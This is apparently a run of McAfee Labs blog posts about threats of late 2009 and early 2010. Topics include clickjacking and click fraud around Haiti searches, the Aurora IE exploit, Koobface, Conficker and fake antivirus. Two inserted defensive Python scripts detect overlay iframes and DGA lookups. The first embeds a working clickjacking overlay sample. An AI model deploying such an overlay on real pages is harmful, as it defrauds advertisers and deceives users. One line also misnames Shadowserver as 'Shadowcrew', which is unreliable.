In my last post I mentioned that the “Operation Aurora” exploit code was public and that we could expect other attacks leveraging the CVE-2010-0249 exploit to emerge.  Given the significance of the recent earthquake in Haiti, and the slew of phishing sites, email scams, etc., it makes sense that attackers would try to combine an unpatched Internet Explorer vulnerability with Haiti-related web content.

I figured a good place to look for attackers is by Googling the most popular search terms of the day.  It’s been a while since I last researched search engine manipulation.  As expected, it was quite easy to find high-ranking search results for Haiti-related terms; the vast majority led to malicious rogue-antivirus sites, similar to earlier blog posts.  I did not come across any sites exploiting the recent zero-day IE vulnerability.  However, I did come across plenty of clickjacking, and not just clickjacking: the attackers have incorporated Google Trends, Digg.com, black-hat SEO, and click fraud as well.

Here’s the apparent flow of the attack:

The attacker finds a hot search term using Google Trends or some other keyword tracking site (and perhaps anticipates term variations):

Next, they create the malicious web page (more below) and submit an entry to Digg.com using the same title, and a description that includes a bunch of relevant terms.  They also Digg the story (+1):

Seemingly the affiliation with Digg.com, the association of the title (taken from Google Trends), and description help boost the ranking in Google’s search results:

When a user follows the link on Digg.com, they are taken to a generic website that entices them to click on a “Play” icon.

What the user doesn’t see is the content that sits behind the image.  When a user clicks on the image, that click is passed along to an advertisement delivered through Google’s ad network (note that the sites in the image below are potential victims here too, as they could be charged for “unwanted clicks” on their ads).

This form of click fraud can generate money for the attacker.  If the fraud goes unnoticed, the advertiser would likely pay a referral fee to the attacker.
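The hidden-overlay trick described above leaves a trace in the page markup: a frame element styled to be transparent yet positioned (or stacked with a z-index) over visible content is exactly the “content that sits behind the image.” The Python script below is an added example, not code from the original post or from McAfee. It scans HTML with the standard-library parser and flags such elements, the way a web gateway or crawler feeding a reputation system might; the page it scans is constructed for illustration, and the `ads.example` and `video.example` URLs are placeholders.

```python
"""Flag transparent, positioned frame elements that can capture clicks.

Added example, not code from the original post. A click meant for the
visible "Play" image lands on whatever frame is stacked transparently above
it, which is the overlay pattern described in the text.
"""
import re
from html.parser import HTMLParser

# Elements that can load third-party content (an ad, a page) into a rectangle.
FRAME_TAGS = {"iframe", "object", "embed"}

# Legacy IE syntax for transparency, common in pages of this era.
ALPHA_FILTER = re.compile(r"alpha\(\s*opacity\s*=\s*(\d+)\s*\)")


def parse_style(style):
    """Turn an inline style string into a {property: value} dict (lower-cased)."""
    props = {}
    for decl in (style or "").split(";"):
        name, sep, value = decl.partition(":")
        if sep:
            props[name.strip().lower()] = value.strip().lower()
    return props


def is_transparent(props):
    """True when the element is (nearly) invisible but still receives clicks.

    visibility:hidden and display:none are ignored on purpose: such elements
    do not get pointer events, so they cannot be used to hijack a click.
    """
    opacity = props.get("opacity")
    if opacity is not None:
        try:
            if float(opacity) <= 0.1:
                return True
        except ValueError:
            pass
    match = ALPHA_FILTER.search(props.get("filter", ""))
    return bool(match and int(match.group(1)) <= 10)


class OverlayScanner(HTMLParser):
    """Collect frame elements whose style makes them transparent overlays."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in FRAME_TAGS:
            return
        attr = {name: (value or "") for name, value in attrs}
        props = parse_style(attr.get("style"))
        reasons = []
        if is_transparent(props):
            reasons.append("transparent")
        if props.get("position") in ("absolute", "fixed"):
            reasons.append("position:" + props["position"])
        if props.get("z-index") not in (None, "auto"):
            reasons.append("z-index:" + props["z-index"])
        # Transparent alone is odd but harmless in normal flow; transparent
        # and positioned or stacked is the overlay signature worth reporting.
        if "transparent" in reasons and len(reasons) > 1:
            self.findings.append({
                "tag": tag,
                "src": attr.get("src") or attr.get("data", ""),
                "reasons": reasons,
                "line": self.getpos()[0],
            })


def scan_html(html):
    """Return a list of suspicious overlay findings for one HTML document."""
    scanner = OverlayScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


# Constructed page: a visible "Play" image with an invisible ad frame stacked
# on top of it, plus an ordinary visible video embed that must not be flagged.
SAMPLE_HTML = """<html><body>
<div style="position:relative;width:640px;height:360px">
  <img src="play.png" alt="Play" style="position:absolute;top:0;left:0">
  <iframe src="https://ads.example/serve?client=pub-000" width="640" height="360"
          style="position:absolute;top:0;left:0;opacity:0;z-index:10;filter:alpha(opacity=0)"></iframe>
</div>
<iframe src="https://video.example/embed/123" width="640" height="360"></iframe>
</body></html>"""

if __name__ == "__main__":
    for hit in scan_html(SAMPLE_HTML):
        print(f"line {hit['line']}: <{hit['tag']} src={hit['src']}> {', '.join(hit['reasons'])}")
```

The heuristic requires both transparency and explicit positioning, so the ordinary video embed is not reported, while the transparent, absolutely positioned ad frame is. The same pattern is what the framed site defends against from its own side, with frame-busting script or the X-Frame-Options response header, which is the control an advertiser or ad network would ask for once it sees charges for clicks like these.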

The web server shows many search terms seeded this way, including several related to Haiti:

  • haiti-breaking-news
  • haiti-earthquake-damage
  • haiti-earthquake-info
  • haiti-earthquake-relief
  • haiti-earthquake-time
  • haiti-pact-with-the-devil
  • haiti-pat-robertson
  • haiti-relief-effort
  • haiti-support
  • haitian-earthquake-relief
  • haitian-relief-efforts
  • hatia-earthquake-pictures

I should note that this isn’t so much a Haiti-targeted attack, but rather an attack targeted at any popular topic on the web right now.  In fact, they’re poisoning the term “internet security 2010 virus removal”, which exists because web users fell victim to rogue antivirus software, some undoubtedly due to the same type of search engine poisoning.

“Operation Aurora” Leading to Other Threats

Operation Aurora has received a lot of attention over the past couple of days.  To recap, Google, Adobe, and many other companies were attacked with code exploiting a zero-day vulnerability in Internet Explorer.  Since the announcement of this vulnerability (CVE-2010-0249), exploit code has been made public and already revised into a more usable form.

History tells us that when exploit code targeting an unpatched vulnerability in popular software is released, a slew of attackers are ready, willing, and able to capitalize.  What started out as a sophisticated targeted attack is likely to lead to large-scale attacks on vulnerable Microsoft Internet Explorer users.  This often takes the form of drive-by download sites serving malware to unsuspecting users, lured by links spammed in email, social networking sites, blogs, and poisoned search engine results.

For more information on this vulnerability, the Operation Aurora attack, and ways to protect your environment see:
More Details on “Operation Aurora”

More Details on “Operation Aurora”

Earlier today, George Kurtz posted an entry, ‘Operation “Aurora” Hit Google, Others’, on McAfee’s Security Insight blog. The purpose of this post is to answer questions about this particular attack and to fill in some of the threat flow and McAfee coverage details.

How were systems compromised?
When a user manually loaded or navigated to a malicious web page from a vulnerable Microsoft Windows system, JavaScript code exploited a zero-day vulnerability in Internet Explorer, the Microsoft Internet Explorer DOM Operation Memory Corruption Vulnerability.  Microsoft has released Security Advisory (979352) for this vulnerability (CVE-2010-0249).

What was the payload of the exploit?
Once a system was successfully compromised, the exploit was designed to download and run an executable from a site, which has since been taken offline.  That executable installed a remote access Trojan to load at startup.  This Trojan also contacted a remote server.  This allowed remote attackers to view, create, and modify information on the compromised system.

How wide-spread is this attack?
Aurora appears to have been a very concentrated attack on specific targets.  It is not believed to be widespread at this time.

How serious is this vulnerability?
The Microsoft Internet Explorer vulnerability leveraged in this attack allows for remote code execution, but does require user intervention (such as following a hyperlink to a website or opening an email attachment).  Furthermore, the single exploit known to exist can be thwarted by Data Execution Prevention (DEP), enabled by default in Internet Explorer 8 and optionally in Internet Explorer 7.  Microsoft lists the following combinations as vulnerable: Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2.

How are McAfee customers protected from this attack?
McAfee DAT files (antivirus): Coverage will be provided for associated malware (as Exploit-Comele, Roarur.dr, and Roarur.dll) in the 5862 DATs, releasing January 15. Partial coverage is provided in the current (5861) DATs for some components as Generic.dx!kwv, Generic Spy.e, Spy-Agent.ey, and Exploit-Comele.

McAfee VirusScan Enterprise Buffer Overflow Protection: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Host Intrusion Prevention: Generic Buffer Overflow Protection is expected to cover some, but not all, exploits.

McAfee Network Security Platform: The UDS release of January 14 contains the signature “UDS-HTTP: Microsoft Internet Explorer HTML DOM Memory Corruption” which provides coverage.

McAfee Vulnerability Manager: The FSL/MVM package of January 14 includes a vulnerability check to assess if your systems are at risk.

Updated Jan 14
McAfee Web Gateway (formerly Webwasher): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 16
McAfee Firewall Enterprise (formerly Sidewinder): TrustedSource has coverage for domains and IP addresses that the malware contacts, and coverage for associated malware was released January 15 (as BehavesLike.JS.Obfuscated.E); proactive coverage existed for some components (as Trojan.Crypt.XDR.Gen).

Updated Jan 18
McAfee Network Security Platform: Extended coverage is provided in the January 18 UDS release via the “Microsoft Internet Explorer HTML DOM Memory Corruption III” signature. Coverage was originally provided in the UDS release of January 14.

McAfee Application Control: All versions of McAfee Application Control protect against infection, without updates, and will prevent all versions of the “Aurora” attack witnessed to date.

McAfee Firewall Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts. The embedded McAfee AV scanning engine in Firewall Enterprise version 7.0.1.02 and later provides coverage for supported protocols via standard McAfee DAT updates. Coverage for known exploits and associated malware is provided as Exploit-Comele, Roarur.dr, and Roarur.dll in the 5862 DATs, released January 15.

McAfee SiteAdvisor, SiteAdvisor Plus, SiteAdvisor Enterprise: TrustedSource has coverage for domains and IP addresses that the malware contacts.

Updated coverage information will be communicated through McAfee Security Advisories:
http://www.mcafee.com/us/threat_center/securityadvisory/signup.aspx

BlackBerry Messenger the new vehicle to distribute Hoaxes?

I received an interesting IM from a friend via BlackBerry Messenger [BBM] this weekend. She was worried that it could do damage to her shiny new BlackBerry and, as she knew I work for McAfee, she forwarded it to me for my opinion.

BlackBerry Messenger Hoax

As soon as I read it, I knew it was a hoax and told her just to delete it.

It didn’t really surprise me that these hoaxes are now being spread via BBM, as the devices are becoming increasingly popular. I’m sure all of you have received the usual one via e-mail about a virus that burns the whole hard disk C: of your computer; well, now I believe you will be seeing them on your BlackBerry.

I don’t want to take the usual route of blaming social networking sites, but I believe they are the cause of this new wave of hoaxes. The problem with social networks is that they enable almost anyone to add you on several different IM services just by visiting your page, if you do not set your privacy settings correctly.

The new BBM also enables you to add new users by taking a picture of a barcode which is uniquely created for your BlackBerry pin. This makes it incredibly easy for people who you don’t know to add you to their contact list, which leaves you open to receiving more Hoaxes or Spam messages.

I have personally seen lots of these barcodes on several social networks and forums, and I warn those who read this blog not to do the same and to share their PIN only with contacts they trust.

Users should be careful who they accept as contacts, as you may start to see a lot more of these Hoaxes or even Spam in your BBM inbox.

No More Dragons: the 26th Chaos Communication Congress Ends

With a dazzling laser show, the 26th Chaos Communication Congress (26c3) in Berlin, the last big security conference of 2009, has ended. If you haven’t been here, you might have missed fewer of the sessions than people on site, thanks to the worldwide availability of live streams (and recordings). What you did miss was meeting all these people, though!

26c3 has simply outgrown the location it has occupied for the last few years, but this may be offset by a very successful experiment: allowing full remote access to the conference network via VPN for those who couldn’t attend. Other conferences should consider this (hey, Defcon team, are you reading this? ;) ) as well, especially as air travel becomes less and less attractive.

During the last two days a number of the talks were on GSM security (Harald Welte, Dieter Spaar) and tracking phones (L. Aaron Kaplan). In case you missed Dan Kaminsky’s “Black Ops of PKI” earlier this year, we had another chance. Just before the closing ceremony, Frank Rieger and Ron repeated their session “Security Nightmares” for the 10th time.

Security Nightmares was an entertaining, though a bit scary, summary of this year’s security issues and incidents, and a look at the future coupled with a wish list. Most notably, they’d like to see personal liability of executive management for the misuse of data. They call for a law for all companies to inform a customer or contact once a year about the personal data they have, what they did with it, and whom they shared it with or sold it to. The speakers repeatedly outlined the problem of data that people put online about themselves and their friends. Because pretty much all data leaks to the general public sooner or later, we need to take the utmost care when determining what to put online.

My personal rule: Don’t put anything online if you don’t want to see it on the front page of a newspaper.

I’ll finish with a quote from Security Nightmares (though I think it’s originally from Bruce Schneier): “Data is the pollution [problem] of the information age.” There’s something to think about when all the New Year’s Eve parties are over. Have a happy and secure 2010!

Fake Alert Uses McAfee-like Domain Name to Attract Victims

Cybercriminals love to use social engineering techniques to trick users into installing their malware. One of the latest fake-alert variants attempts to trick users into believing the software is related to or hosted by McAfee: mcafeevirusremover.com.

With DAT release 5835 (December 17) McAfee detects the HTML code for the domain as FakeAlert-KW!htm and the associated Trojan as FakeAlert-KW. The script hosted by the domain can attack the Windows browsers Internet Explorer, Mozilla Seamonkey, and Chrome. The script also affects browsers on Linux platforms.

This fake-alert variant is hosted on at least 13 other known domains. McAfee’s TrustedSource blocks the IP addresses and the domains (including DNS and mail servers) associated with this Trojan. For example:

TS Screenshot

The infection begins by redirecting the victim to the domain hosting the Trojan script code. This website is designed to look like Windows Explorer in Windows XP. It “reports” multiple infections on the victim’s computer:

Domain screenshot

If the user clicks anything within the browser, the FakeAlert-KW Trojan will download. Once it is installed, the Trojan offers a graphical interface designed to appear as a legitimate security application reporting multiple infections on the victim’s computer:

Screenshot01

Screenshot02

Infected machines will also suffer a barrage of pop-up balloons from the System Tray warning of various problems that require the user to register the software for a fee to “clean” the system:

Screenshot05

Screenshot03

Remember to update your McAfee products to ensure you are protected from these threats.

Dragons Everywhere: The 26th Chaos Communication Congress, Part 2

Day 2 and Night 2 of the 26th Chaos Communication Congress are over, so it’s time for a short update on what you are missing here.

This year the Congress is organized as a distributed event: Many local Hacker Spaces have joined the network at Berlin Conference Center, giving access to resources and talks to visitors. Check out the Dragons Everywhere Wiki at 26c3 for more info. And of course there are still the live streams of the talks available.

One highlight was certainly an update of the current debate around the Vorratsdatenspeicherung (“data retention”). CCC spokesperson Constanze Kurz expects a favorable ruling against the current laws by the highest German court. This may have an EU-wide impact.

At the same time (and thank goodness there were streams available!) was Collin Mulliner’s talk about fuzzing smart phones and some of his (and Charlie Miller’s) findings.

Felix “FX” Lindner changed sides: in a talk covering defense instead of breaking things, he demonstrated the security problems that come with Flash and released Blitzableiter (“lightning rod”), a tool for sandboxing .swf files to prevent a class of Flash exploits. His tool is still work in progress but already looks very promising.

And to finish the day there was the Phonoelit Party at c-base, featuring Mumpi, Vela, and Illo. Another great event!

Of course, this selection is just my personal preference. Make sure to check the schedule for talks that interest you. ;)

2010 Predictions: the Year of a Major Social Networking Security Breach?

With the New Year just days away, it’s time for McAfee Labs 2010 Threat Predictions. What should you be wary of in the coming year? Social networks.

Sites such as Twitter and Facebook have changed the way we communicate, interact, and share on the web. As user bases for the top online social destinations reach record highs, cybercriminals are building out their criminal toolkits, taking advantage of new technologies, third-party applications, and hotspots of activity to exploit users.

What does this mean for the average surfer? Next time you receive an invite from one of your “Facebook friends” to play a game that looks like it’s shaping up to be the next Farmville, think twice before you click. In 2010, users are going to be more vulnerable to attacks that blindly distribute fake apps across their networks. The same goes for bit.ly’s and TinyURLs. As abbreviated URLs become more ubiquitous, it will be even easier for cybercriminals to mask and direct users to malicious sites.

Speaking of ubiquity: McAfee Labs predicts that Adobe will overtake Microsoft as the No. 1 target for cybercriminals in 2010. Adobe products—in particular Acrobat Reader and Flash—have become two of the most widely used apps in the world, and cybercriminals go where the masses go. Cybercriminals will have a field day preying on people using Adobe software.

McAfee also believes the following will play a critical role in 2010:

  • Banking Trojans will become even more sophisticated. They showed some firepower in 2009—easily getting around current protections used by banks—but next year they will reach a new level with the ability to interrupt legitimate transactions and make unauthorized withdrawals, while flying under the radar.
  • Malware via email attachments will increase, especially targeting corporations, journalists, and individuals
  • Botnets, the infrastructure that launches nearly every type of cyberattack, will adopt a peer-to-peer architecture, connecting computer to computer without a centralized control point—making it more difficult for cybersecurity professionals to detect them
  • HTML 5 and the evolution of the programming language will give cybercriminals new opportunities to write malware and prey on users

Countering these trends, in 2010 McAfee predicts a good year for law enforcement and the ability to identify, track, and combat cybercrime worldwide. After a decade of cybersecurity research, coordination, and training undertaken by agencies across the globe, the community will reap the benefits of the effort put forth over the past ten years.

McAfee Labs serves up the details on its threat predictions in the full report. Surf the web cautiously in 2010!

(We must correct one oversight: Our colleague Pedro Bueno was one of the authors of the report. His name was inadvertently left off the document. Thanks, Pedro!)

(Not So) Happy Holidays from Koobface

Koobface has been busy. Activities associated with the worm have increased during the month of December. Often the activity is sending traffic to compromised servers to obtain more servers. Other times it uses those compromised servers to proxy users to malicious domains that distribute more malware or take control of the infected machines.

This morning we noticed a trend: some of the domain-based locations are making use of the holiday theme. This has included everything from “presents for your pets” to “festive holiday trees.” These are domains that appear legitimate but are not. In fact, many of the domains were legitimate at one point but are now serving a different purpose.

Holiday Koobface Greetings

When users go to these happy holiday sites, they are greeted by having files downloaded to their computers. Then they receive the gift of holiday identity theft!

We have monitored the progress of this attack and its spread throughout the day. Based upon past trends we expect it to continue to evolve and find new servers and methods with similar associations over the next few weeks.

Spread of Koobface Holiday Cheer

Stay updated and safe over the holidays!

Hacker’s Holiday: a Viral Video!

Ketchup stains. Klingons. Exploding monitors. They’re all part of our fiendishly clever new music video, “Hacker’s Holiday.” Pity poor Tiny Tim. He gets a shiny new PC for Christmas and doesn’t bother to protect it. Well, you can guess the rest. A few short days later (12 days maybe?) his PC is ready for the ashcan of history. But how will Tiny Tim exact his revenge? Watch and learn:

And yeah, that’s one guy doing all the sounds, all the singing, all the work. Mister Tim, also star of Enter Kazoo Man and the composer of Star Wars (John Williams is the Man) wrote this little ditty with our help.

If you like it, star it and share it. Thanks! And Happy Holidays from McAfee.

Check Your Friends! Facebook IMs May Lead To Trouble

I ran into a few strange IMs over the weekend. When I was not shoveling out my driveway from the 15 inches of snow that covered it I was logged into Facebook telling people about it…. It was then that I started receiving some VERY interesting IMs from a friend extolling the virtues of a clean colon (yep – you read that right):

Colon Cleanse IM

This led to the following questionable site, which had some very interesting comments on our SiteAdvisor site:

Colon Cleanse Website

In short order I also received two more IMs. The first was a video (sound familiar???):

Facebook Video IM

Which led to a pretty darn good fake Facebook login page (note the SiteAdvisor warning on that page!):

FaceBook Phishing Page

The address this page was hosted on also had a VERY malicious reputation rating from our TrustedSource technology:

TrustedSource Rep Page

Last but not least I got one that included sales pricing for Christmas!!! It is the holidays and scammers certainly like using seasonal trends:

Christmas IM Scam

This led to a really well done “replicas” site with brands such as Rolex, Tiffany, Breitling and others:

Fake Watch Site

I contacted my friend (who was certainly NOT sending the IMs knowingly) and got them fixed up pretty quickly. Not surprisingly, it was a Koobface variant on the local machine they were logging into Facebook from.

Facebook is one of the greatest and most popular sites on the Internet today. It has a huge user base, and as such is heavily targeted by scammers and malware writers. Make sure the computer you are accessing it from has up-to-date and properly configured security software!

Conficker Again in the News, Part 2

Yesterday, my colleague Dave Marcus quoted for you the new graphs and stats posted by Shadowserver. Indeed, since November 2008, W32/Conficker (alias Downup, Downadup, Kido) has frequently made headlines. This computer worm has five main variants, which have appeared during the last year. Wikipedia lists the dates: 

  • A variant: First appeared 21 November 2008
  • B variant: First appeared 29 December 2008
  • C variant: First appeared 20 February 2009
  • D variant: First appeared 4 March 2009
  • E variant: First appeared 7 April 2009  (self-destruction on 3 May 2009)

W32/Conficker spreads via the Windows AutoRun feature, drive sharing, and Microsoft vulnerabilities. At the end of 2008, the A and B versions took advantage of a newly discovered Windows Remote Procedure Call service vulnerability (MS08-067). That’s how Conficker’s masters created a large botnet involving one million unique IPs on a daily basis. The worm used a date-based algorithm to generate 250 domains per day under generic top-level domains. Infected machines then attempted to contact one of these domains in order to install specific malware.

In a similar manner, hosts infected with the C variant generated 50,000 unique URLs ending with a country-code top-level domain and attempted to connect to the first URL that was ready to distribute a digitally signed payload. This third variant also contained peer-to-peer functionality.
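The date-based domain generation described in the two paragraphs above leaves a characteristic trace in DNS logs: one client resolving a burst of random-looking names across many TLDs, most of which nobody has registered, so its NXDOMAIN rate climbs far above that of normal hosts. The Python below is an added example; it is neither the worm’s algorithm (which the post does not give) nor McAfee code. It scores each client in a constructed DNS query log on its NXDOMAIN ratio and on how machine-generated its queried labels look, and flags clients that exceed both thresholds. The log format, IP addresses and domain names are all constructed.

```python
"""Flag DNS clients whose lookups resemble date-based domain generation.

Added example, not the worm's algorithm and not McAfee code. A host running
a generator resolves many random-looking names per day across several TLDs;
almost all of them are unregistered, so the client's NXDOMAIN rate soars.
"""
import math
from collections import defaultdict

VOWELS = set("aeiou")

# Constructed query log, one "<timestamp> <client_ip> <qname> <rcode>" per line.
SAMPLE_LOG = """\
2009-12-03T10:00:01 10.0.0.5 qzkvwtrpd.com NXDOMAIN
2009-12-03T10:00:02 10.0.0.5 xhjgbplmw.net NXDOMAIN
2009-12-03T10:00:03 10.0.0.5 tkwqzrnbv.org NXDOMAIN
2009-12-03T10:00:04 10.0.0.5 pvmlkdzhx.info NXDOMAIN
2009-12-03T10:00:05 10.0.0.5 ghrtbzxqw.biz NXDOMAIN
2009-12-03T10:00:06 10.0.0.5 wqpxzvjkl.cc NOERROR
2009-12-03T10:00:07 10.0.0.5 zbvxkqwtn.ws NXDOMAIN
2009-12-03T10:00:08 10.0.0.5 update.microsoft.com NOERROR
2009-12-03T10:00:09 10.0.0.7 www.example.com NOERROR
2009-12-03T10:00:10 10.0.0.7 mail.example.com NOERROR
2009-12-03T10:00:11 10.0.0.7 cdn.cloudfront.net NOERROR
2009-12-03T10:00:12 10.0.0.7 www.facebook.com NOERROR
2009-12-03T10:00:13 10.0.0.7 www.exampel.com NXDOMAIN
2009-12-03T10:00:14 10.0.0.9 wikipedia.org NXDOMAIN
2009-12-03T10:00:15 10.0.0.9 wikipedia.org NOERROR
"""


def entropy(label):
    """Shannon entropy of a label in bits per character."""
    if not label:
        return 0.0
    counts = defaultdict(int)
    for ch in label:
        counts[ch] += 1
    n = len(label)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def registrable_label(qname):
    """Label just left of the TLD; a simplification of public-suffix handling."""
    parts = qname.lower().rstrip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def looks_generated(label, max_vowel_ratio=0.2, max_consonant_run=5):
    """Cheap linguistic test: pronounceable words have vowels spread through them."""
    if len(label) < 5:
        return False  # too short to judge
    vowels = sum(1 for ch in label if ch in VOWELS)
    run = longest = 0
    for ch in label:  # digits and hyphens count as non-vowels here
        run = 0 if ch in VOWELS else run + 1
        longest = max(longest, run)
    return vowels / len(label) < max_vowel_ratio or longest >= max_consonant_run


def analyze(log_text, min_queries=5, nx_threshold=0.6, generated_threshold=0.6):
    """Return per-client counters and a 'suspect' verdict for one log."""
    stats = defaultdict(lambda: {"queries": 0, "nxdomain": 0,
                                 "generated": 0, "entropy_sum": 0.0})
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) != 4:
            continue  # skip malformed lines instead of crashing on them
        _ts, client, qname, rcode = fields
        label = registrable_label(qname)
        s = stats[client]
        s["queries"] += 1
        s["nxdomain"] += rcode == "NXDOMAIN"
        s["generated"] += looks_generated(label)
        s["entropy_sum"] += entropy(label)
    report = {}
    for client, s in stats.items():
        q = s["queries"]
        # Both signals must fire: many failed lookups AND unpronounceable names.
        suspect = (q >= min_queries
                   and s["nxdomain"] / q >= nx_threshold
                   and s["generated"] / q >= generated_threshold)
        report[client] = {"queries": q, "nxdomain": s["nxdomain"],
                          "generated": s["generated"],
                          "mean_entropy": round(s["entropy_sum"] / q, 2),
                          "suspect": suspect}
    return report


if __name__ == "__main__":
    for client, row in analyze(SAMPLE_LOG).items():
        print(client, row)
```

Shannon entropy is computed as well, but for labels of eight or nine characters it barely separates `qzkvwtrpd` from `cloudfront`, so the verdict leans on the vowel ratio and consonant runs together with the NXDOMAIN rate; either signal alone produces false positives (a typo'd hostname, a CDN with an odd name). Public-suffix handling is simplified to the label left of the last one, and there is no time window; a real deployment would use the public suffix list and score per hour or per day so that a short burst is not diluted by normal traffic.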

The D and E variants were not so prolific; they helped spread the C version as well as other malware (W32/Waledec) and fake anti-virus software.

Estimating the size of the Conficker population is almost impossible. In January, a 10-million-host figure was frequently quoted in the media. McAfee announced one million unique IPs were alive (or online) every 24 hours, while another security company claimed that at least one out of every 16 PCs worldwide was infected. In March another source said that more than 35 million unique IPs had been botnet zombies since November 2008.

Today the A, B, and C variants maintain a huge foothold worldwide. In October, researchers estimated the number of systems infected topped seven million. Following Dave’s advice, I visited the new Shadowserver statistics page. To illustrate the extent of how this malware affects the world, the organization monitored the Autonomous System Number blocks that have at least one Conficker IP in their network space. The charts highlight the widespread infection and propagation as well as the ratio of infected IP addresses for each autonomous system block.

Shadowserver names 183 country codes and 5994 autonomous systems with Conficker IPs in their network space:

  • 1086 for the Russian Federation (RU)
  • 597 for the United States (US)
  • 422 for Ukraine (UA)
  • 271 for Romania (RO)
  • 244 for Brazil (BR)
  • 243 for Republic of Korea (KR)
  • 184 for Poland (PL)
  • 166 for Bulgaria (BG)
  • 147 for Europe (EU)
  • 129 for Indonesia (ID)
  • 113 for Japan (JP)
  • 95 for China (CN)
  • 94 for India (IN)

You can also find a Top 500 list for the autonomous systems hosting the largest number of infected IPs as well as the percentage of their entire routed space that is affected by the worm. CHINANET and CHINA169 take the top positions, but with only 1.1 percent and 1.2 percent of unique aggregate IPs. In the 420th position, we discover that 26.36 percent of CHILE S.A.’s routed space is affected by the worm.

If you want to know how your autonomous systems or your country-code top-level domain are positioned, check out the Shadowcrew website.

We don’t really know the objectives of Conficker attacks, even though we can guess the motivations are financial. The consensus in the security community is that it was created to make botnets for hire. The botnet can be rented to criminals who want to send spam, distribute rogue spyware products, steal credentials, and direct users to online scams and phishing sites.

In May, Mike Steward from the Canadian Internet Registration Authority suggested that in the worst case Conficker could become a powerful cyberwarfare weapon, one that could disrupt not just countries but the Internet itself.

Conficker Again in the News

Our good friends at Shadowserver have recently added some excellent graphs and stats that highlight the continued infections and propagation by the Conficker worm.

Conficker, although it actually does very little, continues to be a major annoyance worldwide, so let’s use these excellent charts and graphs as a reason to revisit two important points:

  • Update your systems to current patch levels
  • Use up-to-date and properly configured security software. Deploy these at a variety of levels whenever possible. (Layers of defense work better than a single solution.)

Take these two steps and you will be protected against Conficker and a whole lot more. Threats are complex, and combating them really does take layers of defense along with appropriate security technologies. In this age of “blended” and “Web 2.0” threats, it is wise to incorporate host IPS, network IPS, reputation technologies, and cloud technologies.

The bad guys are always looking for new ways to make their malware and attacks more successful. The good news is we are always working on new technologies to make them less successful.

Good News from China

As outlined in our recent report Mapping the Mal Web, the People’s Republic of China’s top-level domain (.cn) is currently one of the riskiest domains to surf, due to numerous malware downloads and other risky sites. However, this state of affairs may now change for the better:

On December 11 the China Internet Network Information Center (CNNIC), the state network information center of China, released an update regarding its auditing of domain name registrations. As of today, domain name applicants must submit a formal paper-based application when making an online application to the registrar. This includes the original application form with business seal, company business license, and a photocopy of the ID.

This change will make the .cn domain very unattractive for criminals and fraudsters who are looking for domains they can register anonymously, preferably paying with stolen credit card information. This would be a great step in making the .cn domain name space a safer place. And if these measures are implemented as announced, it would in fact make China a leading example in the fight against fraudsters on the Internet.

I do hope that one small part of the announcement suffered just a bit in translation:

“3. From the day of the submission of online application, if CNNIC does not receive the formal paper-based application material within 5 days or the application material auditing is not qualified, the domain name to be applied will be deleted.”

I hope this means the application, not the domain, will be deleted after being in service for just five days. If not, this has the potential to become “Domain Tasting 2.0.”

McAfee Labs Releases December Spam Report

The United States is still a safe haven for spammers. With U.S. anti-spam legislation doing very little to thwart spammers and the McColo takedown having only a short-term effect, we have found that due to low-cost and reliable hosting and anonymous domain registration, our country remains the world’s top source for spam.

The December report also reveals:

  • “Twitter job” spam, which has been going on for months, is on the rise. It’s a scam that tries to get people to create Twitter accounts and send spam to their followers for money.
  • This season’s Christmas-themed malware is focused on the recession, advertising fake luxury goods and brands that are “on sale” through email
  • One year after the McColo ISP shutdown, spam has risen beyond the levels before McColo was taken offline
  • January 1, 2010, marks the sixth anniversary of the CAN-SPAM Act of 2003, but spam levels have reached record levels in the six years since the legislation passed

Read the report in its entirety here.

‘Ho, Ho, Ho’: Santa Delivers FakeAV Presents

Following the latest Captcha techniques used by the W32/Koobface worm, it seems that malware authors have turned to Santa for help to deliver the nasty surprise which awaits Facebook users. The infection drops other Trojans, such as FakeAlert, and leaves the user in trouble.

It all begins with a post on a user’s Facebook wall. If the user clicks on the link, he or she sees a fake video player with a Christmas greeting, as shown below.

A fake message states that to view the video the user must download the latest version of Adobe Flash. If the user clicks “install,” the malware runs a variant of W32/Koobface on the user’s system.  Further, the user’s browser is redirected to more harmful sites harboring malicious files that automatically execute on the infected system.

Among the malicious files that are downloaded and executed are FakeAlert Trojans, which display a fake message stating that the system is infected with various viruses and that the user should buy a product to remove them.

I suggest you avoid installing anything that results from clicking video links related to any Christmas greetings.

Should Facebook’s New Privacy Features Concern You?

Facebook has changed the rules again. Should you be concerned?

On December 9 Facebook rolled out a new feature that was previously announced via an open letter from Facebook founder Mark Zuckerberg. This feature asked users to review their privacy settings to give them more control over who can view the content they publish on the popular social networking site. This change has upset some of Facebook’s users because they see this as an effort by Facebook to get users to make public more of the information that they post. Further, that information will be indexable by search engines such as Bing, which has announced that it will allow searches of status updates posted to Facebook and Twitter. This is a big change for most users, whose current settings may be restricted to family, friends, or groups they’ve joined.

Should users be worried? That depends on what type of information is being posted. Regardless of the privacy policies or the amount of data available to search engines or other users, the ultimate arbiter of what is posted and shared is each user. The service is called social networking for a reason.

Here’s the point: Although users do need to make sure they are aware of the privacy policies of the sites they enjoy and how that information might be used by others, ultimately the users themselves control what is posted online and what applications are installed in their profiles.

If you do not want to share information, do not post it. Once your data gets picked up by search engines, it’s virtually impossible to have it removed. It becomes part of your online brand forever.

FIFA World Cup Tickets Scams Available Now

We recently alerted our readers to spam campaigns using the H1N1 vaccination program to prompt recipients to open the mail. And we have frequently mentioned that crooks love to take advantage of news, disasters, and other events.

Now that the final draw for the FIFA World Cup in South Africa next year has taken place, it is time to remind you that sports events are no exception to the rule. I’ve already found some examples.

